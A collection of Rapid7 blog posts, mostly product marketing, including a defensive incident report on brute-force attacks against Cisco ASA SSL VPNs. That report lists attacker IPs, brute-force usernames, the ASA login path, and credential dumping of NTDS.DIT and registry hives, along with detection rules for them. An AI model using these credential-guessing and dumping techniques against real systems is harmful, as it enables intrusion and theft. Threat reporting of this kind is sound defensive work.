Introducing Active Risk

Cyber risk is increasing both in volume and velocity. Given the landscape of threats, weaknesses, vulnerabilities, and misconfigurations, organizations, teams and vulnerability analysts alike need of better prioritization mechanisms. That’s why we developed a new risk scoring methodology: Active Risk.

Rapid7 has offered five risk strategies for many years, each strategy with its own specific approach to surfacing that which matters most. Our sixth risk strategy, Active Risk, is designed to focus security and remediation efforts on the vulnerabilities that are actively exploited in the wild or most likely to be exploited.

Active Risk uses CVSS scores along with intelligence from threat feeds like AttackerKB, Metasploit, ExploitDB, Project Heisenberg, CISA KEV list, and other third-party dark web sources to provide security teams with threat-aware vulnerability risk scores on scale of 0-1000.

Active Risk is available via InsightVM, InsightCloudSec, Nexpose, and our recently released Executive Risk View.

Enter Active Risk

Introducing Active Risk

Exploitability has become one of those terms that the security community has maligned, not out of spite, but simply because it’s been applied to too many use cases. Exploitability refers to the ease with which a vulnerability in a computer system, software application, or network can be exploited. But, even that definition can be misleading. Semantics aside, exploitability is really a question of likelihood.

This new risk strategy is focused on delivering unambiguous near-time intelligence, by systematically including a number of threat intelligence sources to enhance vulnerability risk score(s).

There are a number of vulnerability intelligence sources that fuel prioritization in Active Risk, including:

  1. AttackerKB: Launched in 2020, a forum for the security community at large to share insights and views that help cut through all the hype and chaos, with a primary purpose to inform infosec professionals on vulnerabilities and security threats
  2. Project Heisenberg: A network of low interaction honeypots with a singular purpose, to understand what attackers, researchers, and organizations are doing in, across, and against cloud environments. This global network established in 2014, by Rapid7, it records telemetry about connections and incoming attacks to better understand the tactics, techniques, and procedures used by bots and human attackers
  3. Metasploit: Arguably the most widely used, community supported, ethical hacking framework on the planet, used by whitehats, security researchers and generalists in pentesting, <pick-your-color> teaming, CTF drills, education as well as broad or very specialized security assessment exercises
  4. Exploit Database (exploit-db.com): Widely used online repository and reference for security researchers, pentesters, and ethical hackers; it’s become a go-to resource offering an extensive archive of exploits and vulnerabilities, allowing users to track the evolution of security threats over time across software, hardware, and operating systems
  5. CISA Key Exploited Vulnerabilities (KEV) Catalog: Established in 2021 to “provide an authoritative source of vulnerabilities that have been exploited ‘in the wild,’” by the Cybersecurity & Infrastructure Security Agency; witnessing fairly broad and hasty adoption across industries as a method to focus and improve remediation throughput
  6. OSINT and Commercial Feeds: Dependent on the nature of the vulnerability or threat the sources above are combined and validated with additional intelligence and context to enhance prioritization results and ultimately customer outcomes

The immediate value in threat intel data ingestion and normalization alone, that Active Risk delivers, will incentivize and amplify the interest for potential adoption. Active Risk is also CVSS 3.1 compliant across all new CVEs and makes ready future adoption of revised scoring systems (CVSS v4.0 is targeting October 31, 2023 publication). There is strong market demand and intensifying use and application of ‘exploitability’ intelligence as seen in CVSS v4.0 and in CISA KEV as previously mentioned.

Normalize vulnerability risk scoring across cloud and on-prem environments

Active Risk normalizes risk scores across cloud and on-premises environments to effectively assess and collaborate with teams across an organization.

Security teams can leverage Active Risk dashboard cards in InsightVM and Executive Risk View in our Cloud Risk Complete solution to support cross-functional conversations.

Introducing Active Risk

Active Risk is a step change along the path of risk prioritization improvement, and the much longer and windier road we travel together towards improved risk management outcomes.

A Look at Our Development Process of the Cloud Resource Enrichment API

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/09/07/a-look-at-our-development-process-of-the-cloud-resource-enrichment-api/

A Look at Our Development Process of the Cloud Resource Enrichment API

In today’s ever-evolving cybersecurity landscape, detecting and responding to cyber threats is paramount for organizations in cloud environments. At the same time, investigating cyber threat alerts can be arduous due to the time-consuming and complex process of data collection. To tackle this pain point, Rapid7 developed a new Cloud Resource Enrichment API that streamlines data retrieval from various cloud resources. The API empowers security analysts to swiftly respond to cyber threats and improve incident response time.

Identifying the Need for a Unified API

Protecting cloud resources from cyber attacks is a growing challenge. Security analysts must grapple with gathering relevant data spread across multiple systems and APIs, leading to incident response inefficiencies. Presented with this challenge, we recognized a pressing need for a unified API that collects all relevant data types related to a cloud resource during a cyber threat action. This API streamlines data access, enabling analysts to piece together a comprehensive view of incidents rapidly, enhancing cybersecurity operations.

Defining the Vision and Scope

Our development team worked closely with security analysts to tailor the API’s functionalities to meet real-world needs. Defining the API’s scope involved meticulous prioritization of features, striking the right balance between usability and data abundance. By involving analysts from the outset, we laid a solid foundation for the API’s success.

The Development Journey

Adopting agile methodologies, our team iteratively developed the API, adapting and fine-tuning as we progressed. The iterative development process played a vital role in ensuring the API’s success. By breaking down the project into smaller, manageable tasks, we could focus on specific features, implement them efficiently, and gather feedback from early prototypes. With a comprehensive design phase, we defined the API’s architecture and capabilities based on insights from security analysts. Regular meetings and feedback gathering facilitated continuous improvements, streamlining the data retrieval process.

The API utilizes RESTful API design principles for data integration and communication between cloud systems. It collects the following types of data:

  • Harvested cloud resource properties (image, IP, network interfaces, region, cloud organization and account, security groups, and much, much more)
  • Permissions data (permissions on the resource, permissions of the resource)
  • Security insights (risks, misconfigurations, vulnerabilities)
  • Security alerts (“threat finding”)
  • First level cloud related resources
  • Application context (tagging made by the client in the cloud environment)

Each data type required collaboration with a different team which is responsible for collecting and processing the data. This resulted in a feature that involved developers from 6 different teams! Regular meetings and continuous communication with the development team and the product manager, allowed us to incorporate suggestions and make iterative improvements to the API’s design and functionality.

Conclusion

The development journey of our Cloud Resource Enrichment API has been both challenging and rewarding. With a user-centric approach, we have crafted a powerful tool that empowers security teams to respond effectively to cyber threats. As we continue to enhance the API, we remain committed to fortifying organizations’ cyber defenses and elevating incident response capabilities. Together, we can better equip security analysts to face the ever-changing cyber war with confidence.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Tyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this blog.

Rapid7’s managed detection and response (MDR) teams have observed increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March 2023. In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups.

There is no clear pattern among target organizations or verticals. Victim organizations varied in size and spanned healthcare, professional services, manufacturing, and oil and gas, along with other verticals. We have included indicators of compromise (IOCs) and attacker behavior observations in this blog, along with practical recommendations to help organizations strengthen their security posture against future attacks. Note: Rapid7 has not observed any bypasses or evasion of correctly configured MFA.

Rapid7 has been actively working with Cisco over the course of our investigations. On August 24, Cisco’s Product Security Incident Response Team (PSIRT) published a blog outlining attack tactics they have observed, many of which overlap with Rapid7’s observations. We thank Cisco for their collaboration and willingness to share information in service of protecting users.

Observed attacker behavior

Rapid7 identified at least 11 customers who experienced Cisco ASA-related intrusions between March 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance servicing SSL VPNs for remote users. ASA appliance patches varied across compromised appliances — Rapid7 did not identify any particular version that was unusually susceptible to exploitation.

In our analysis of these intrusions, Rapid7 identified multiple areas of overlap among observed IOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor infrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242. We also saw overlap in accounts used to authenticate into internal systems, including the use of accounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to successfully authenticate to internal assets — in several cases, attackers successfully authenticated on the first try, which may indicate that the victim accounts were using weak or default credentials.

The below image is an anonymized log entry where an attacker attempts a (failed) login to the Cisco ASA SSL VPN service. In our analysis of log files across different incident response cases, we frequently observed failed login attempts occurring within milliseconds of one another, which points at automated attacks.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

In most of the incidents we investigated, threat actors attempted to log into ASA appliances with a common set of usernames, including:

  • admin
  • adminadmin
  • backupadmin
  • kali
  • cisco
  • guest
  • accounting
  • developer
  • ftp user
  • training
  • test
  • printer
  • echo
  • security
  • inspector
  • test test
  • snmp

The above is a fairly standard list of accounts that may point at use of a brute forcing tool. In some cases, the usernames in login attempts belonged to actual domain users. While we have no specific evidence of leaked victim credentials, we are aware that it’s possible to attempt to brute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are also visible in the source code of the VPN endpoint login page and can be easily extracted, which can aid brute forcing attacks.

Upon successful authentication to internal assets, threat actors deployed set.bat. Execution of set.bat resulted in the installation and execution of the remote desktop application AnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on systems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the adversary access to additional domain user credentials. The threat actors performed further lateral movement and binary executions across other systems within target environments to increase the scope of compromise. As mentioned previously, several of the intrusions culminated in the deployment and execution of Akira or LockBit-related ransomware binaries.

Dark web activity

In parallel with incident response investigations into ASA-based intrusions, Rapid7 threat intelligence teams have been monitoring underground forums and Telegram channels for threat actor discussion about these types of attacks. In February 2023, a well-known initial access broker called “Bassterlord” was observed in XSS forums selling a guide on breaking into corporate networks. The guide, which included chapters on SSL VPN brute forcing, was being sold for $10,000 USD.

When several other forums started leaking information from the guide, Bassterlord posted on Twitter about shifting to a content rental model rather than selling the guide wholesale:

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Rapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test. It’s possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual’s instruction contributed to the uptick in brute force attacks targeting Cisco ASA VPNs.

Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs

Indicators of compromise

Rapid7 identified the following IP addresses associated with source authentication events to compromised internal assets, as well as outbound connections from AnyDesk:

  • 161.35.92.242
  • 173.208.205.10
  • 185.157.162.21
  • 185.193.64.226
  • 149.93.239.176
  • 158.255.215.236
  • 95.181.150.173
  • 94.232.44.118
  • 194.28.112.157
  • 5.61.43.231
  • 5.183.253.129
  • 45.80.107.220
  • 193.233.230.161
  • 149.57.12.131
  • 149.57.15.181
  • 193.233.228.183
  • 45.66.209.122
  • 95.181.148.101
  • 193.233.228.86
  • 176.124.201.200
  • 162.35.92.242
  • 144.217.86.109

Other IP addresses that were observed conducting brute force attempts:

  • 31.184.236.63
  • 31.184.236.71
  • 31.184.236.79
  • 194.28.112.149
  • 62.233.50.19
  • 194.28.112.156
  • 45.227.255.51
  • 185.92.72.135
  • 80.66.66.175
  • 62.233.50.11
  • 62.233.50.13
  • 194.28.115.124
  • 62.233.50.81
  • 152.89.196.185
  • 91.240.118.9
  • 185.81.68.45
  • 152.89.196.186
  • 185.81.68.46
  • 185.81.68.74
  • 62.233.50.25
  • 62.233.50.17
  • 62.233.50.23
  • 62.233.50.101
  • 62.233.50.102
  • 62.233.50.95
  • 62.233.50.103
  • 92.255.57.202
  • 91.240.118.5
  • 91.240.118.8
  • 91.240.118.7
  • 91.240.118.4
  • 161.35.92.242
  • 45.227.252.237
  • 147.78.47.245
  • 46.161.27.123
  • 94.232.43.143
  • 94.232.43.250
  • 80.66.76.18
  • 94.232.42.109
  • 179.60.147.152
  • 185.81.68.197
  • 185.81.68.75

Many of the IP addresses above were hosted by the following providers:

  • Chang Way Technologies Co. Limited
  • Flyservers S.A.
  • Xhost Internet Solutions Lp
  • NFOrce Entertainment B.V.
  • VDSina Hosting

Log-based indicators:

  • Login attempts with invalid username and password combinations (%ASA-6-113015)
  • RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)

Mitigation guidance

As Rapid7’s mid-year threat review noted, nearly 40% of all incidents our managed services teams responded to in the first half of 2023 stemmed from lack of MFA on VPN or virtual desktop infrastructure. These incidents reinforce that use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.

To mitigate the risk of the attacker behavior outlined in this blog, organizations should:

  • Ensure default accounts have been disabled or passwords have been reset from the default.
  • Ensure MFA is enforced across all VPN users, limiting exceptions to this policy as much as possible.
  • Enable logging on VPNs: Cisco has information on doing this for ASA specifically here, along with guidance on collecting forensic evidence from ASA devices here.
  • Monitor VPN logs for authentication attempts occurring outside expected locations of employees.
  • Monitor VPN logs for failed authentications, looking for brute forcing and password spraying patterns.
  • As a best practice, keep current on patches for security issues in VPNs, virtual desktop infrastructure, and other gateway devices.

Rapid7 is monitoring MDR customers for anomalous authentication events and signs of brute forcing and password spraying. For InsightIDR and MDR customers, the following non-exhaustive list of detection rules are deployed and alerting on activity related to the attack patterns in this blog:

  • Ingress Auth by Local ASA Account
  • Attacker Technique – NTDS File Access
  • Attacker Tool – Impacket Lateral Movement
  • Process Spawned By SoftPerfect Network Scanner
  • Execution From Root of ProgramData

Various sources have recently published pieces noting that ransomware groups appear to be targeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends reviewing the IOCs and related information in this blog and in Cisco’s PSIRT blog and taking action to strengthen security posture for VPN implementations.

Why Your AWS Cloud Container Needs Client-Side Security

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/24/why-your-aws-cloud-container-needs-client-side-security/

Why Your AWS Cloud Container Needs Client-Side Security

With increasingly complicated network infrastructure and organizations needing to deploy applications across various environments, cloud containers are necessary for companies to stay agile and innovative. Containers are packages of software that hold all of the necessary components for an app to run in any environment. One of the biggest benefits of cloud containers? They virtualize an operating system, enabling users to access from private data centers, public clouds, and even laptops.

According to recent research by Faction, 92% of organizations have a multi-cloud strategy in place or are in the process of adopting one. In addition to the ubiquity of cloud computing, there are a variety of cloud container providers, including Google Cloud Platform (GCP), Amazon Web Services (AWS), and Microsoft Azure. Nearly 80% of all containers on the cloud, however, run on AWS, which is known for its security, reliability, and scalability.

When it comes to cloud container security, AWS works on a shared responsibility model. This means that security and compliance is shared between AWS and the client. AWS protects the infrastructure running the services offered in the cloud — the hardware, software, networking, and facilities.

Unfortunately, many AWS users stop here. They believe that the security provided by AWS is sufficient to protect their cloud containers. While it is true that the level of customer responsibility for security differs depending on the AWS product, each product does require the customer to assume some level of security responsibility.

To avoid this mistake, let’s examine why your AWS cloud container needs additional client-side security and how Rapid7 can help.

Top reasons why your AWS container needs client-side security

Visibility and monitoring

Some of the same qualities that make containers ideal for agility and innovation also creates difficulty in visibility and monitoring. Cloud containers are ephemeral, which means they’re easy to establish and destroy. This is convenient for quickly moving workloads and applications, but it also makes it difficult to track changes. Many AWS containers share memory and CPU resources with a variety of hosts (physical and cloud) in your ecosystem. Consequently, monitoring resource consumption and assessing container performance and application health can be difficult — after all, how can you know how much memory is being utilized by the container or the physical host?

Traditional monitoring tools and solutions also fail to collect the necessary metrics or provide the crucial insights needed for monitoring and troubleshooting container health and performance. While AWS offers protection for the cloud container structure, visualizing and monitoring what happens within the container is the responsibility of your organization.

Alert contextualization and remediation

As your company grows and you scale your cloud infrastructure, your DevOps teams will continue to create containers. For example, Google runs everything in containers and launches an epic amount of containers (several billion per week!) to keep up with their developer and client needs. While you might not be launching quite as many containers, it’s still easy to lose track of them all. Organizations utilize alerts to keep track of container performance and health to resolve problems quickly. While alerting policies differ, most companies use metric- or log-based alerting.

It can be overwhelming to manage and remediate all of your organization’s container alerts. Not only do these alerts need to be routed to the proper developer or resource owner, but they also need to be remediated quickly to ensure the security and continued good performance of the container.

Cybersecurity standards

While AWS provides security for your foundational services in containerized applications — computing, storage, databases, and networking — it’s your responsibility to develop sufficient security protocols to protect your data, applications, operating system, and firewall. In the same way that your organization follows external cybersecurity standards for security and compliance across the rest of your digital ecosystem, it’s best to align your client-side AWS container security with a well-known industry framework.

Adopting a standardized cybersecurity framework will work in concert with AWS’s security measures by providing guidelines and best practices — preventing your organization from a haphazard security application that creates coverage gaps.

How Rapid7 can help with AWS container security

Now that you know why your organization needs client-side security, here’s how Rapid7 can help.

  • Visibility and monitoring: Rapid7’s InsightCloudSec continuously scans your cloud’s infrastructure, orchestration platforms, and workloads to provide a real-time assessment of health, performance, and risk. With the ability to scan containers in less than 60 seconds, your team will be able to quickly and accurately track changes in your containers and view the data in a single, convenient platform, perfect for collaborating across teams and quickly remediating issues.
  • Alert contextualization and remediation: Client-side security measures are key to processing and remediating system alerts in your AWS containers, but it can’t be accomplished manually. Automation is key for alert contextualization and remediation. InsightCloudSec integrates with AWS services like Amazon GuardDuty to analyze logs for malicious activity. The tool also integrates with your larger enterprise security systems to automate the remediation of critical risks in real time — often within 60 seconds.
  • Cybersecurity standards: While aligning your cloud containers with an industry-standard cybersecurity framework is a necessity, it’s often a struggle. Maintaining security and compliance requirements requires specialized knowledge and expertise. With record staff shortages, this often falls by the wayside. InsightCloudSec automates cloud compliance for well-known industry standards like the National Institute of Standards and Technology’s (NIST) Cybersecurity Framework (CSF) with out-of-the-box policies that map back to specific NIST directives.

Secure your container (and it’s contents)

AWS’s shared responsibility model of security helps relieve operational burdens for organizations operating cloud containers. AWS clients don’t have to worry about the infrastructure security of their cloud containers. The contents in the cloud containers, however, are the owner’s responsibility and require additional security considerations.

Client-side security is necessary for proper monitoring and visibility, reduction in alert fatigue and real-time troubleshooting, and the application of external cybersecurity frameworks. The right tools, like Rapid7’s InsightCloudSec, can provide crucial support in each of these areas and beyond, filling crucial expertise and staffing gaps on your team and empowering your organization to confidently (and securely) utilize cloud containers.

Want to learn more about AWS container security? Download Fortify Your Containerized Apps With Rapid7 on AWS.

Three Security Vendor Consolidation Myths Debunked

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/23/3-security-vendor-consolidation-myths/

Three Security Vendor Consolidation Myths Debunked

When it comes to security vendor consolidation, Gartner found that 57% of organizations are working with fewer than ten security vendors, utilizing consolidation to cut costs and improve their overall security posture.

But what about the other 43%?

While security vendor consolidation has many advantages — like improved security and operational efficiency as well as cost reduction and improved ROI — however, it’s clear that some myths about consolidation persist. Let’s take a deeper look at three of the most common consolidation myths:

  • The supremacy of “best of breed” security solutions
  • Lack of flexibility or vendor lock-in
  • Increased risk of vendor compromise

Myth #1: The supremacy of “best of breed” security solutions

One of the biggest myths of security vendor consolidation is that after consolidating, organizations will lose access to the superior “best of breed” security approach. “Best of breed” refers to purchasing the best product of each type for your infrastructure’s security needs. This could look like using one vendor for firewall protection, another for observability, a third for remediation, and so on.

While it is true that a “best of breed” approach seems to allow organizations to piece together a tech stack of all the best possible products, that’s not the whole story. Organizations with “best of breed” solutions often end up with technology bloat, or a larger tech stack that requires far more maintenance than single-platform or more streamlined offerings. Additionally, there’s more data created from using tools from multiple vendors, which can actually increase an organization’s attack surface and overall risk level.

Some “best of breed” environments are plagued by interoperability issues — the tools fail to communicate with each other and exchange information properly. This can result in a poorer overall security performance characterized by false alarms and a higher mean time to resolve (MTTR).

Myth #2: Consolidation kills flexibility and creates vendor lock-in

Many security teams believe that consolidation locks you into working with a single or smaller number of vendors who may prove to be unreliable or offer subpar services. In reality, you can easily address concerns of vendor performance and flexibility by carefully researching potential vendors before selecting a solution. During the vetting process, ask potential vendors questions around on- and offboarding, security, maintenance, subscription, and licensing fees.

It’s also important to remember that many vendors offer flexibility within their consolidation packages, which means that you often will be able to build a portfolio of products to meet your needs as opposed to being locked into a specific package.

Finally, working with fewer vendors allows you to develop stronger relationships with fewer vendor representatives, resulting in more comprehensive customer service and support.

Myth #3: Increased risk from vendor compromise

Many organizations fear that after consolidating, if one of its vendors is compromised, then it presents a serious security risk. This is easily avoidable, however, if organizations practice consolidation across functions and not layers.

In general, secure organizations have layers of security, or redundancies in place to catch and remediate vulnerabilities quickly. This approach, also known as “defense in depth,” may look like a security solution to monitor your endpoints and a separate tool to manage threats in your ecosystem.

You don’t want to consolidate within these layers. For example, let’s imagine that you have the same security provider for both your endpoint monitoring and threat management. If the vendor is compromised and unable to provide protection, your infrastructure would be without endpoint management and threat management at the same time, which presents a serious security risk.

Consequently, you’ll want to consolidate across functions. It may be helpful to picture your security needs within a layer. For example, if you’re looking for greater endpoint protection — monitoring, visibility, and remediation — you can look for consolidation solutions in this area. Consolidating across functions can actually strengthen your security posture. Working from a single platform can improve data sharing across tools, efficiency, and remediation processes, creating a stronger layer of security. Then, if a vendor is compromised, you’ll still have active protection from vendors in your other layers.

Consolidation just makes sense

Hesitation around security vendor consolidation is understandable. It’s important not to rush and choose the wrong vendor or platform, which can ultimately put your organization at risk. However, widespread consolidation myths may be holding you back from reaping the financial, operational, and security benefits of consolidation.

Lowering costs is a big one. Organizations with a variety of security vendors are paying for each service, and often, multiple licenses. Consolidation offers a chance to cut costs of multiple subscription and licensing fees, as well as reap the benefits of competitively priced consolidation packages.

Consolidation also boosts operational efficiency. Organizations with too many security vendors struggle with visibility, false alarms, and gaps in their infrastructure’s coverage. The interoperability that consolidation offers can eliminate false alarms and boost visibility, while working with security vendors to build a customized consolidated security package that fits your organization’s needs.

When it comes to consolidation, breaking down the major misconceptions can lead to a stronger, more cohesive security solution equipped to handle the rapidly changing threat landscape.

Want to learn more about consolidation and where to get started? Check out our eBook, “The Case for Security Vendor Consolidation.”

Ransomware-as-a-Service cheat sheet

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/22/ransomware-as-a-service-cheat-sheet/

Ransomware-as-a-Service cheat sheet

Ransomware-as-a-Service, or RaaS, has taken the threat landscape by storm — so much so that in 2023, the White House re-classified ransomware as a national security threat. How has RaaS taken the impact of ransomware attacks to this next level of federal concern? By allowing potential cybercriminals to launch a ransomware attack regardless of their experience with programming or technical sophistication.

According to Cybersecurity Ventures, ransomware might cost companies nearly $265 billion annually by the end of 2031. Meanwhile, bad actors get a lot of bang for their buck with Ransomware-as-a-Service. RaaS kit subscriptions can be as little as $40 per month.

That said, security professionals shouldn’t roll over or wave the white flag. Implementing a few key strategies can minimize the effect and decrease the likelihood of falling victim to a RaaS attack.

What is RaaS?

Organizations should clearly understand what RaaS is to make their security strategies specific to the needs of ransomware defense.

So, what is Ransomware-as-a-Service? It’s a business model designed by larger, more sophisticated ransomware groups. These groups utilize their technical expertise to create portable ransomware packages — or kits — that they then sell to buyers aiming to launch their own ransomware attacks.

Basically, ransomware operators turn their processes into a program or software usable by other threat actors. RaaS packages are often advertised on forums on the dark web, and they can also come with downloadable features, bundled offers, and 24/7 support staff. Well-known examples of groups that produce RaaS kits include:

RaaS kits aren’t developed out of the goodness of ransomware groups’ hearts. As noted above, these kits operate similarly to SaaS business models in that users follow some type of payment plan with the original ransomware operators.

These plans might look like:

  • A one-time licensing fee
  • A monthly subscription fee
  • An affiliate program fee — which typically entitles a chunk of the profits to the ransomware group
  • Pure profit sharing

Defending against RaaS attacks

When it comes to Ransomware-as-a-Service, the best method of defense follows a pretty consistent cybersecurity theme: Prevention is protection. Ransomware attacks are extremely costly and time-consuming for security teams to retroactively address. So, implementing security strategies aimed at stopping RaaS users in their tracks should be considered essential.

However, RaaS attacks are evolving faster than ever, so it can be tough for security teams to know where to start. Here’s a cheat sheet of three easy ways to defend your organization from RaaS attacks — well before they even strike.

1. Patch, patch, and patch again

Patching is a critical part of cybersecurity maintenance. Ransomware operators are looking out for new vulnerabilities to exploit around the clock — after all, that’s their full-time job. So, it’s critical for organizations to amp up their vulnerability management strategy and stay on top of the growing list of critical vulnerability exploits (CVEs) that bad actors use to breach sensitive systems and assets. A rigorous patching program will go a long way in keeping the latest RaaS kits at bay.

RaaS Hack: Keep tabs on what vulnerabilities your organization might have by checking up on CISA’s Known Exploited Vulnerabilities Catalog. This federal resource includes a bulletin that security teams can subscribe to, as well as downloadable versions in CSV and JSON formats.

2. Segment networks to prevent widespread environment proliferation

One of the biggest problems with RaaS attacks is that they move fast. Once RaaS users find an “in,” they can swiftly move into other connected environments — which can lead to an organization getting completely infested by ransomware.

To prevent the RaaS ripple effect, organizations should segment their networks. Network segmentation compartmentalizes one larger network into sub-networks, which allows security teams to devise security controls unique to each smaller network. Sub-networks not only make network security more manageable, they also make network security more diverse — mitigating the damage of one exploited vulnerability.

3. Build and maintain a culture of security

An organization is only as strong as its weakest link — and more often than not, humans are the weakest link. IBM’s 2023 X-Force Threat Intelligence Index found that successful phishing campaigns caused 41% of all security incidents. That means a critical remedy for RaaS attacks is providing organization-wide education on attempts via phishing, business email compromise, or other attack methods reliant on human error.

RaaS Hack: If your organization has limited resources for cybersecurity, leveraging managed services can implement cybersecurity “training wheels.” Managed services vendors can help educate your teams — and by proxy, your whole organization — on best practices for protection against RaaS attacks.

Next steps for RaaS defense

RaaS attacks are growing more frequent and more sophisticated, and it can be tough to match and meet bad actors where they’re at when you are inundated with a laundry list of other daily tasks.

That’s why we built Managed Threat Complete, an always-on MDR with vulnerability management in a single subscription that helps take the load off your security teams so they have space to innovate and strategize. Leverage the skill of our world-class cybersecurity experts and learn how to implement robust RaaS defense in your organization today.

Rapid7 Takes 2023 SC Awards for Vulnerability Management and Threat Detection

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/22/rapid7-takes-2023-sc-awards-for-vulnerability-management-and-threat-detection/

Rapid7 Takes 2023 SC Awards for Vulnerability Management and Threat Detection

The highly respected SC Awards program, hosted by SC Media, recognizes the solutions, organizations, and people driving innovation and success in information security. Now in its 26th year, the SC Awards continue to grow and evolve.

Rapid7 is proud to announce we have received not one, but two prestigious SC Awards this year! InsightVM is the 2023 SC Award recipient for Best Vulnerability Management Solution and InsightIDR received the award in the brand new Best Threat Detection Technology category.

This year, SC’s panel of independent industry leaders, from sectors including healthcare, financial services, manufacturing, consulting, and education sorted through a record number of entries. Additionally, SC added several new award categories and several modified categories to the competition.

Why InsightVM was selected

InsightVM is a vulnerability management tool that provides visibility into an organization’s security program, enabling security teams to reduce attack surface and security risk. The tool helps manage and mature vulnerability management programs by identifying vulnerabilities, prioritizing remediation efforts, and tracking progress against key metrics.

SC Media says InsightVM was selected for its ability to support the entire vulnerability management lifecycle and enabling security teams to manage their program more effectively. SC also noted the solution’s integration with Project Sonar for external-facing asset and threat exposure monitoring, as well as its robust tagging system to prioritize critical assets for remediation. Finally, they noted that live dashboards, Remediation Projects, and Goals and SLAs ease collaboration with stakeholders.

InsightVM was designed to provide a shared view and common language needed to collaborate with traditionally siloed teams and drive impactful remediation. As a result, easy collaboration stands out to customers as well.

“We’ve got at least five different teams that have responsibility for their own systems,” said Nick Defoe, Director of Information Security, US Signal. “Using the dashboard interface, we’ve been able to build out the reporting for each individual team. Getting these disparate groups all into one platform where they can see what they need to do for vulnerability management has been critical to our success.”

Why InsightIDR was selected

InsightIDR, Rapid7’s cloud-native XDR and next-gen SIEM, offers unified and transformed security data to detect real attacks and provide high-context insights to stop threats early in the attack chain.

According to SC Media, InsightIDR was selected because it empowers teams to deliver sophisticated detection and response outcomes with greater efficiency and efficacy, wherever they are in their security journey. This tracks with customers, as well.

In a recent Techvalidate survey, 92% of Rapid7 customers reported that InsightIDR creates efficiency and scale, and it offers savings that make it an accessible and robust solution for diverse industries and teams.

“When I put Rapid7 in place my response time went from three to four hours to ten to fifteen minutes,” said Kerry LeBlanc, IT Security Engineer, Bioventus. “I see what it is and how to remediate it. Everything is right there. I can query the endpoint or get information and pull up different things on the user.”

SC also noted InsightIDR’s “complete visibility, coverage, superior signal-to-noise, and smarter responses.” InsightIDR provides this complete visibility and coverage with a native endpoint agent, network sensors, collectors and APIs. Lightweight, software-based collection technology and integrations go beyond unifying data to correlate, attribute, and enrich diverse datasets into a single, harmonious picture — unlocking efficiency to give teams time back, ensure that they find real threats faster, and that they can respond quickly and completely.

Rapid7 offers free trials of both InsightVM and InsightIDR.